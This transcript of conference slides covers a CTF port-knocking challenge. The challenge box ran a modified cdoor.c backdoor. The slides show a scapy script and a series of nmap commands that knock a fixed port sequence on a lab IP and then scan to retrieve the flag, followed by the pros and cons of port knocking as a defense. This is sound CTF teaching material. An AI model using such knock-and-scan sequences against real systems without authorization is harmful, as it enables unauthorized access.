Александр Зайцев - port knocking, short notes
TRANSCRIPT
![Page 1: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/1.jpg)
Port knocking challenge
PHD CTF Afterparty 2011
the short notes
Sheridan: Knock, knock.
Ivanova: Who's there?
Sheridan: Kosh.
Ivanova: Kosh who?
Sheridan: Gesundheit. [snickers]
I thought that was a good one.
Babylon 5
![Page 2: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/2.jpg)
Step by step into the trap
Step 1 Step 2 Step 3 Step 4
Copyright: http://www.portknocking.org/
![Page 3: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/3.jpg)
Task overview
1 box running FreeBSD
1 anonymous FTP server
1 file: traffic.zip->traffic.pcap
Slightly modified cdoor.c by FX of Phenoelit
![Page 4: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/4.jpg)
Traffic.pcap #1
![Page 5: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/5.jpg)
Traffic.pcap #2
![Page 6: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/6.jpg)
Initial state
![Page 7: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/7.jpg)
“Knocked” state
![Page 8: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/8.jpg)
EINDBAZEN solution
#!/usr/bin/python
# sheldon.py
# EINDBAZEN solution to port knocking challenge PHD CTF Quals 2011
# Import scapy
from scapy.all import *
conf.verb = 0
# Ports
ports = [951, 4826, 9402, 235, 16821, 443, 100]
# Knock twice on every port
for dport in range(0, len(ports)):
print "[*] Knocking on 192.168.0.5: " , ports[dport]
ip = IP(dst="192.168.0.5")
port = 39367
SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0)
send(SYN) ; print "*KNOCK*"
port = 39368
SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0)
send(SYN) ; print "*KNOCK*"
print "PENNY"
# Use NMAP for scanning for open ports
# We also use -sV, so nmap connects to the port and get the flag
print "[*] Scanning for open ports using nmap"
subprocess.call("nmap -sS -sV -T4 -p 1024-2048 192.168.0.5", shell=True)
![Page 9: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/9.jpg)
Simple solution
nmap -n -sS -T2 -r -p951 192.168.0.5
nmap -n -sS -T2 -r -p4826 192.168.0.5
nmap -n -sS -T2 -r -p9402 192.168.0.5
nmap -n -sS -T2 -r -p235 192.168.0.5
nmap -n -sS -T2 -r -p16821 192.168.0.5
nmap -n -sS -T2 -r -p443 192.168.0.5
nmap -n -sS -T2 -r -p100 192.168.0.5
nmap -n -sS -T4 -p1024-2048 -sV 192.168.0.5
![Page 10: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/10.jpg)
Why not?
The best way to send the required SYN packets to the system is the use of nmap: ./nmap -sS -T Polite -p<port1>,<port2>,<port3> <target> NOTE: the Polite timing ensures, that nmap sends the packets serial as defined.
FX - cdoor.c
Why not “nmap -n -sS -T2 -r -p951,4826,9402,235,16821,443,100 192.168.0.5”?
Because:
Now “–T Polite” doesn’t ensure sequential transmission of SYN packets
![Page 11: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/11.jpg)
Advantages
Sequence of 3 simple TCP knocks requires 281,474,976,710,656 packets to bruteforce (worst case)
Usually only the IP provided the correct sequence is whitelisted
Simple implementation – less vulnerabilities
Prevents login bruteforce and mass vulnerability exploitation
In some cases may aid in DoS mitigation
Modern implementations allow usage of cryptographic hashes inside knocking sequence (Single Packet Authentication)
![Page 12: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/12.jpg)
Disadvantages
If knocking daemon dies – “system dies”
solved by process monitor daemon
Can be locked out with IP-Spoof
solved by adding crypto-hashes
Dropped packets result in incorrect knock
solved by retransmission
![Page 13: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/13.jpg)
Defense in depth
after all it’s just anotherlayer
![Page 14: Александр Зайцев - Port Knocking, short notes](https://reader035.vdocuments.us/reader035/viewer/2022062320/55937a451a28abfb3a8b4597/html5/thumbnails/14.jpg)
The more you know
http://www.phenoelit-us.org/stuff/cd00rdescr.html
- original cdoor.c
http://eindbazen.net/?p=316
- challenge write-up from EINDBAZEN team
http://en.wikipedia.org/wiki/Port_knocking
- basic info (used in this presentation:)
http://www.portknocking.org
– one big port knocking/SPA resource
http://www.aldabaknocking.com/?q=portknocking
– another big port knocking/SPA resource